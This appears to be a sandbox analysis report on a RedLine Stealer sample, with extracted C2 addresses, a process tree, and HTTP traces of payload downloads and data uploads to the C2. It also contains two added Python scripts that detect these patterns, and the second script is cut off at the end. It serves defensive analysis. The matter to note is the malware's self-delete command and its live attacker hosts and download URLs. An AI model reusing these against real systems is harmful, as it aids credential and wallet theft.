Analysis

  • max time kernel
    62s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-05-2021 18:31

General

  • Target

    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe

  • Size

    1.0MB

  • MD5

    033e13c4aca370aeeb8031dbce7bf0b9

  • SHA1

    406100cd169260cecdf31914d055b612f678b00e

  • SHA256

    3d29b2a1a23b12a5134fbe8b17fe5ba0c87549e5671232eb9e842c2a55ad8f2b

  • SHA512

    4aa49c6b70df63bb022b5c7fcd7aef985c503dd21f6994394a4360a98cba4f3283f2dd8e986d9bf23cfe94425286526fff0f5b296a71c364b7a3e05d639ad00f

Malware Config

Extracted

Family

redline

Botnet

EUMX

C2

tstamore.info:80

Extracted

Family

redline

Botnet

121212

C2

168.119.241.77:60932

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and autofill entries.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The signature's stock description labels this likely ransomware behaviour, but drive enumeration on its own is also routine host fingerprinting for an infostealer, and nothing else in this report points to file encryption.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    "C:\Users\Admin\AppData\Local\Temp\3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Users\Admin\AppData\Local\Temp\262124620.exe
      C:\Users\Admin\AppData\Local\Temp\262124620.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3936
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960
    • C:\Users\Admin\AppData\Local\Temp\2095039246.exe
      C:\Users\Admin\AppData\Local\Temp\2095039246.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1524
      • C:\Users\Admin\AppData\Local\Temp\2095039246.exe
        C:\Users\Admin\AppData\Local\Temp\2095039246.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4004
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2208
      • C:\Windows\SysWOW64\PING.EXE
        ping 0
        3⤵
        • Runs ping.exe
        PID:3392
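
The tree above shows three behaviours worth a rule: every dropped executable in %TEMP% runs as a child of the sample; 262124620.exe launches the signed .NET helper AddInProcess32.exe and 2095039246.exe launches a second copy of itself (both parents carry the SetThreadContext signature, consistent with injecting into the child); and the sample removes itself with cmd.exe /k ping 0 & del <self> & exit, using ping as a delay. The Python below is an added example, not part of the sandbox report or of the malware: it evaluates constructed process-creation events transcribed from this tree. The rule names, the .NET host binaries listed beyond AddInProcess32.exe and the command-line regex are assumptions.

```python
"""Flag the process-tree patterns from this report in process-creation events.
Added example (not sandbox or RedLine code); rule names and regexes are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Signed .NET binaries commonly used as injection/hollowing targets.
# AddInProcess32.exe is the one in this report; the others are an assumption.
DOTNET_HOSTS = {"addinprocess32.exe", "addinprocess.exe", "regasm.exe",
                "regsvcs.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE = re.compile(r"\\appdata\\local\\temp\\", re.I)
# "ping <x> & del <path> &": ping as a sleep, then delete the parent binary.
SELF_DELETE = re.compile(r'ping\b[^&]*&\s*del\s+"?(.+?)"?\s*(?:&|$)', re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:          # root of the tree: nothing to relate it to
            continue
        name, pname = basename(e.image), basename(parent.image)
        if USER_WRITABLE.search(e.image):
            findings.append((e.pid, f"dropped-exe-executed:{name}"))
            if name == pname:       # same binary re-launched: stage for self-injection
                findings.append((e.pid, f"self-spawn:{name}"))
        if name in DOTNET_HOSTS and USER_WRITABLE.search(parent.image):
            findings.append((e.pid, f"dotnet-host-from-temp:{name}<-{pname}"))
        if name == "cmd.exe":
            m = SELF_DELETE.search(e.cmdline)
            if m and basename(m.group(1)) == pname:
                findings.append((e.pid, f"self-delete:{pname}"))
    return findings


TEMP = r"C:\Users\Admin\AppData\Local\Temp"
LOADER = TEMP + r"\3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe"
# Constructed from the Processes section above; ppid 0 = parent not shown in the report.
SAMPLE_EVENTS = [
    ProcEvent(3016, 0, LOADER, f'"{LOADER}"'),
    ProcEvent(3936, 3016, TEMP + r"\262124620.exe"),
    ProcEvent(2960, 3936, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"),
    ProcEvent(1524, 3016, TEMP + r"\2095039246.exe"),
    ProcEvent(4004, 1524, TEMP + r"\2095039246.exe"),
    ProcEvent(2208, 3016, r"C:\Windows\SysWOW64\cmd.exe",
              f'"C:\\Windows\\system32\\cmd.exe" /k ping 0 & del {LOADER} & exit'),
    ProcEvent(3392, 2208, r"C:\Windows\SysWOW64\PING.EXE", "ping 0"),
]

if __name__ == "__main__":
    for pid, finding in analyze(SAMPLE_EVENTS):
        print(pid, finding)
```

The self-delete rule only fires when the path handed to del is the parent's own image, which keeps ordinary cleanup scripts out; the dotnet-host rule keys on the parent living in a user-writable directory rather than on the host binary alone, since AddInProcess32.exe has legitimate parents under Program Files.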

Network

  • DNS
    youwebmaster.com
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    youwebmaster.com
    IN A
    Response
    youwebmaster.com
    IN A
    104.21.12.23
    youwebmaster.com
    IN A
    172.67.151.79
  • GET
    http://youwebmaster.com/stats.php?company_id=2&lua=user
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    104.21.12.23:80
    Request
    GET /stats.php?company_id=2&lua=user HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.com
    Response
    HTTP/1.1 302 Found
    Date: Wed, 19 May 2021 18:31:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    location: https://iplogger.org/1uSns7
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277e89d700004c4ff6a87000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hNI5d5yllYnmUHSkhLEJatWjnLzGFSZb1SuJIUfpezKE1Bd1rRy5UKN88vuq1eruGgQb83Hu6YVBfiQmvnnkd8YsxWcz%2FZieMbwYlwiTrPDd"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 651f66bc88374c4f-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  • GET
    http://youwebmaster.com/stats.php?company_id=2
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    104.21.12.23:80
    Request
    GET /stats.php?company_id=2 HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.com
    Response
    HTTP/1.1 302 Found
    Date: Wed, 19 May 2021 18:31:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    location: https://iplogger.com/1fnc97
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277e8c1700004c4f9e211000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HYhBmFRA7Rd%2FDd1nTY3SgVUHQumKc1uYEF3209cT3%2F4D6M%2FZcrJhxmBD7eY7mUGPsb9mL%2Bg%2FEkytgZp3knknA9k5V9LtJ%2BnnUklygc3RI4oL"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 651f66c028314c4f-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  • DNS
    iplogger.org
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    iplogger.org
    IN A
    Response
    iplogger.org
    IN A
    88.99.66.31
  • GET
    https://iplogger.org/1uSns7
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    88.99.66.31:443
    Request
    GET /1uSns7 HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: iplogger.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 19 May 2021 18:31:17 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=l3g406tjgkipru58f0sni05fq2; path=/; HttpOnly
    Pragma: no-cache
    Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257599114; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Answers:
    whoami: 16761f25ab5e605af3b542ca9f459d0220efb97174f3a57492c24d6e698a4be3
    Strict-Transport-Security: max-age=31536000; preload
    X-Frame-Options: DENY
  • DNS
    iplogger.com
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    iplogger.com
    IN A
    Response
    iplogger.com
    IN A
    88.99.66.31
  • GET
    https://iplogger.com/1fnc97
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    88.99.66.31:443
    Request
    GET /1fnc97 HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: iplogger.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 19 May 2021 18:31:18 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=jkjnf9uc1c1ebiodatf2iue711; path=/; HttpOnly
    Pragma: no-cache
    Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257599113; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Answers: 1
    whoami: 16761f25ab5e605af3b542ca9f459d0220efb97174f3a57492c24d6e698a4be3
    Strict-Transport-Security: max-age=31536000; preload
    X-Frame-Options: DENY
  • DNS
    youwebmaster.net
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    youwebmaster.net
    IN A
    Response
    youwebmaster.net
    IN A
    109.248.175.187
  • GET
    http://youwebmaster.net/users/content/id03084901/mmow.txt
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /users/content/id03084901/mmow.txt HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:18 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 260
    Location: http://youwebmaster.net/function/v2tmp/momomoomomom.php
    Connection: keep-alive
  • GET
    http://youwebmaster.net/function/v2tmp/momomoomomom.php
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /function/v2tmp/momomoomomom.php HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 184832
    Connection: keep-alive
    Content-Disposition: attachment; filename=m.exe
  • GET
    http://youwebmaster.net/users/content/id48934920847/eustelopo.txt
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /users/content/id48934920847/eustelopo.txt HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:19 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 260
    Location: http://youwebmaster.net/function/v2tmp/eueueuueueue.php
    Connection: keep-alive
  • GET
    http://youwebmaster.net/function/v2tmp/eueueuueueue.php
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /function/v2tmp/eueueuueueue.php HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:19 GMT
    Content-Type: application/octet-stream
    Content-Length: 387168
    Connection: keep-alive
    Content-Disposition: attachment; filename=DunesMultiMedia.exe
  • DNS
    bitrhost.ru
    262124620.exe
    Remote address:
    8.8.8.8:53
    Request
    bitrhost.ru
    IN A
    Response
    bitrhost.ru
    IN A
    217.107.34.191
  • GET
    https://bitrhost.ru/SystemDataCommonSchemaInfo50810
    262124620.exe
    Remote address:
    217.107.34.191:443
    Request
    GET /SystemDataCommonSchemaInfo50810 HTTP/1.1
    Host: bitrhost.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 19 May 2021 18:31:19 GMT
    Content-Type: text/html
    Content-Length: 211216
    Connection: keep-alive
    Server: Jino.ru/mod_pizza
    Last-Modified: Sun, 16 May 2021 09:55:43 GMT
    ETag: "8632df5-33910-5c26f7aee89b6"
    Accept-Ranges: bytes
  • DNS
    tstamore.info
    AddInProcess32.exe
    Remote address:
    8.8.8.8:53
    Request
    tstamore.info
    IN A
    Response
    tstamore.info
    IN A
    185.230.141.234
    tstamore.info
    IN A
    185.26.121.195
  • POST
    http://tstamore.info//
    AddInProcess32.exe
    Remote address:
    185.230.141.234:80
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: tstamore.info
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:25 GMT
    Content-Type: text/xml; charset=utf-8
    Content-Length: 19001
    Connection: keep-alive
  • POST
    http://tstamore.info//
    AddInProcess32.exe
    Remote address:
    185.230.141.234:80
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
    Host: tstamore.info
    Content-Length: 580396
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:30 GMT
    Content-Type: text/xml; charset=utf-8
    Content-Length: 150
    Connection: keep-alive
  • POST
    http://tstamore.info//
    AddInProcess32.exe
    Remote address:
    185.230.141.234:80
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: tstamore.info
    Content-Length: 580382
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:30 GMT
    Content-Type: text/xml; charset=utf-8
    Content-Length: 261
    Connection: keep-alive
  • DNS
    api.ip.sb
    2095039246.exe
    Remote address:
    8.8.8.8:53
    Request
    api.ip.sb
    IN A
    Response
    api.ip.sb
    IN CNAME
    api.ip.sb.cdn.cloudflare.net
    api.ip.sb.cdn.cloudflare.net
    IN A
    104.26.13.31
    api.ip.sb.cdn.cloudflare.net
    IN A
    172.67.75.172
    api.ip.sb.cdn.cloudflare.net
    IN A
    104.26.12.31
  • GET
    https://api.ip.sb/geoip
    AddInProcess32.exe
    Remote address:
    104.26.13.31:443
    Request
    GET /geoip HTTP/1.1
    Host: api.ip.sb
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 19 May 2021 18:31:26 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 285
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    Cache-Control: no-cache
    Access-Control-Allow-Origin: *
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277ead000000d46b471ec000000001
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=I5qG3EkJmN3aBgSKxc6Fs%2Bb8BNNHHB1OJAzMa4gNz4ft16wfgOxNBQ%2BYr0esOSU3G3d3OwjEEDpWA9%2FQWh3Qrr4JNXCHxhEhcwc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 651f66f4c938d46b-HAM
  • POST
    http://168.119.241.77:60932//
    2095039246.exe
    Remote address:
    168.119.241.77:60932
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: 168.119.241.77:60932
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Length: 4656
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Wed, 19 May 2021 18:31:42 GMT
  • POST
    http://168.119.241.77:60932//
    2095039246.exe
    Remote address:
    168.119.241.77:60932
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
    Host: 168.119.241.77:60932
    Content-Length: 5738765
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Content-Length: 150
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Wed, 19 May 2021 18:31:47 GMT
  • POST
    http://168.119.241.77:60932//
    2095039246.exe
    Remote address:
    168.119.241.77:60932
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: 168.119.241.77:60932
    Content-Length: 5738751
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Content-Length: 261
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Wed, 19 May 2021 18:31:47 GMT
  • GET
    https://api.ip.sb/geoip
    2095039246.exe
    Remote address:
    104.26.13.31:443
    Request
    GET /geoip HTTP/1.1
    Host: api.ip.sb
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 19 May 2021 18:31:43 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 285
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    Cache-Control: no-cache
    Access-Control-Allow-Origin: *
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277eef2b0000417a1e94f000000001
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=k4Sn1H5W26yYZ02cBaozSTWmqRcNh8sNpUavVOniZ5IVrxc%2FHnTGOxS2c8iSVgJRfYEwYbN8LNM2sh6JvblY18aAVC5QuquBmw8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 651f675eac5e417a-HAM
  • 104.21.12.23:80
    http://youwebmaster.com/stats.php?company_id=2
    http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    517 B
    1.6kB
    7
    5

    HTTP Request

    GET http://youwebmaster.com/stats.php?company_id=2&lua=user

    HTTP Response

    302

    HTTP Request

    GET http://youwebmaster.com/stats.php?company_id=2

    HTTP Response

    302
  • 88.99.66.31:443
    https://iplogger.org/1uSns7
    tls, http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    968 B
    6.2kB
    12
    8

    HTTP Request

    GET https://iplogger.org/1uSns7

    HTTP Response

    200
  • 88.99.66.31:443
    https://iplogger.com/1fnc97
    tls, http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    922 B
    4.5kB
    11
    7

    HTTP Request

    GET https://iplogger.com/1fnc97

    HTTP Response

    200
  • 109.248.175.187:80
    http://youwebmaster.net/function/v2tmp/eueueuueueue.php
    http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    19.0kB
    589.4kB
    403
    398

    HTTP Request

    GET http://youwebmaster.net/users/content/id03084901/mmow.txt

    HTTP Response

    301

    HTTP Request

    GET http://youwebmaster.net/function/v2tmp/momomoomomom.php

    HTTP Response

    200

    HTTP Request

    GET http://youwebmaster.net/users/content/id48934920847/eustelopo.txt

    HTTP Response

    301

    HTTP Request

    GET http://youwebmaster.net/function/v2tmp/eueueuueueue.php

    HTTP Response

    200
  • 217.107.34.191:443
    https://bitrhost.ru/SystemDataCommonSchemaInfo50810
    tls, http
    262124620.exe
    4.0kB
    221.1kB
    80
    151

    HTTP Request

    GET https://bitrhost.ru/SystemDataCommonSchemaInfo50810

    HTTP Response

    200
  • 185.230.141.234:80
    http://tstamore.info//
    http
    AddInProcess32.exe
    1.2MB
    32.1kB
    810
    304

    HTTP Request

    POST http://tstamore.info//

    HTTP Response

    200

    HTTP Request

    POST http://tstamore.info//

    HTTP Response

    200

    HTTP Request

    POST http://tstamore.info//

    HTTP Response

    200
  • 104.26.13.31:443
    https://api.ip.sb/geoip
    tls, http
    AddInProcess32.exe
    707 B
    4.1kB
    8
    8

    HTTP Request

    GET https://api.ip.sb/geoip

    HTTP Response

    200
  • 168.119.241.77:60932
    http://168.119.241.77:60932//
    http
    2095039246.exe
    11.8MB
    115.9kB
    7871
    2758

    HTTP Request

    POST http://168.119.241.77:60932//

    HTTP Response

    200

    HTTP Request

    POST http://168.119.241.77:60932//

    HTTP Response

    200

    HTTP Request

    POST http://168.119.241.77:60932//

    HTTP Response

    200
  • 104.26.13.31:443
    https://api.ip.sb/geoip
    tls, http
    2095039246.exe
    753 B
    4.1kB
    9
    8

    HTTP Request

    GET https://api.ip.sb/geoip

    HTTP Response

    200
  • 8.8.8.8:53
    youwebmaster.com
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    62 B
    94 B
    1
    1

    DNS Request

    youwebmaster.com

    DNS Response

    104.21.12.23
    172.67.151.79

  • 8.8.8.8:53
    iplogger.org
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    58 B
    74 B
    1
    1

    DNS Request

    iplogger.org

    DNS Response

    88.99.66.31

  • 8.8.8.8:53
    iplogger.com
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    58 B
    74 B
    1
    1

    DNS Request

    iplogger.com

    DNS Response

    88.99.66.31

  • 8.8.8.8:53
    youwebmaster.net
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    62 B
    78 B
    1
    1

    DNS Request

    youwebmaster.net

    DNS Response

    109.248.175.187

  • 8.8.8.8:53
    bitrhost.ru
    dns
    262124620.exe
    57 B
    73 B
    1
    1

    DNS Request

    bitrhost.ru

    DNS Response

    217.107.34.191

  • 8.8.8.8:53
    tstamore.info
    dns
    AddInProcess32.exe
    59 B
    91 B
    1
    1

    DNS Request

    tstamore.info

    DNS Response

    185.230.141.234
    185.26.121.195

  • 8.8.8.8:53
    api.ip.sb
    dns
    2095039246.exe
    55 B
    145 B
    1
    1

    DNS Request

    api.ip.sb

    DNS Response

    104.26.13.31
    172.67.75.172
    104.26.12.31
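
The traffic above falls into three layers: the loader's install-tracking requests (fixed User-Agent "Installed OK 1.0/3", 302 redirects into iplogger), two payload fetches in which a .txt URL 301s to a .php that returns a PE with a Content-Disposition filename, and the RedLine C2 itself, which is SOAP over plain HTTP to a "//" path with SOAPAction values under http://tempuri.org/Endpoint/ (a small GetArguments, then large POST bodies for VerifyScanRequest and GetUpdates), alongside a geoip lookup to api.ip.sb. The Python below is an added example written for this page, not sandbox or RedLine code: it tags transactions transcribed from this section with those patterns and derives the set of C2 host:port pairs, which should equal the two extracted configs (tstamore.info:80 and 168.119.241.77:60932). The tag names, the 100 kB upload threshold and the transcribed subset are assumptions.

```python
"""Tag HTTP transactions with the behaviours seen in this report.
Added example (not sandbox or RedLine code); strings are copied from the
traffic above, thresholds and tag names are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set
from urllib.parse import urlsplit

# RedLine's SOAP endpoint operations, as seen in the POST requests above.
REDLINE_SOAP_ACTIONS = {
    "http://tempuri.org/Endpoint/GetArguments",
    "http://tempuri.org/Endpoint/VerifyScanRequest",
    "http://tempuri.org/Endpoint/GetUpdates",
}
LOADER_UA = "Installed OK 1.0/3"                  # first-stage loader's fixed UA
TRACKER_HOSTS = {"iplogger.org", "iplogger.com"}  # install-tracking redirect targets
GEOIP_HOSTS = {"api.ip.sb"}                       # victim geolocation lookup
LARGE_BODY = 100_000                              # bytes; upload threshold (assumption)
LOADER = "3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe"


@dataclass
class HttpTx:
    process: str
    method: str
    url: str
    req: Dict[str, str] = field(default_factory=dict)
    status: int = 0
    resp: Dict[str, str] = field(default_factory=dict)


def hdr(headers: Dict[str, str], name: str) -> str:
    """Case-insensitive lookup: Cloudflare sent 'location', nginx 'Location'."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return ""


def classify(tx: HttpTx) -> List[str]:
    tags: List[str] = []
    url = urlsplit(tx.url)
    action = hdr(tx.req, "SOAPAction").strip('"')
    if tx.method == "POST" and action in REDLINE_SOAP_ACTIONS:
        tags.append("redline-c2:" + action.rsplit("/", 1)[-1])
        if int(hdr(tx.req, "Content-Length") or 0) >= LARGE_BODY:
            tags.append("large-upload")      # the calls that carry collected data
    if hdr(tx.req, "User-Agent") == LOADER_UA:
        tags.append("loader-ua")
    loc = urlsplit(hdr(tx.resp, "Location"))
    if tx.status in (301, 302) and loc.hostname in TRACKER_HOSTS:
        tags.append("iplogger-redirect")
    if tx.status == 301 and url.path.endswith(".txt") and loc.path.endswith(".php"):
        tags.append("txt-to-php-redirect")   # .txt URL that really serves a PE
    m = re.search(r"filename=([^;]+)", hdr(tx.resp, "Content-Disposition"))
    if m and m.group(1).strip().lower().endswith(".exe"):
        tags.append("pe-download:" + m.group(1).strip())
    if url.hostname in GEOIP_HOSTS:
        tags.append("geoip-lookup")
    return tags


def c2_endpoints(txs: List[HttpTx]) -> Set[str]:
    """host:port of every transaction tagged as RedLine C2; compare with the configs."""
    out: Set[str] = set()
    for tx in txs:
        if any(t.startswith("redline-c2:") for t in classify(tx)):
            u = urlsplit(tx.url)
            out.add(f"{u.hostname}:{u.port or (443 if u.scheme == 'https' else 80)}")
    return out


# Constructed from the Network section above (a subset of the transactions).
SAMPLE = [
    HttpTx(LOADER, "GET", "http://youwebmaster.com/stats.php?company_id=2&lua=user",
           {"User-Agent": LOADER_UA, "Host": "youwebmaster.com"}, 302,
           {"location": "https://iplogger.org/1uSns7"}),
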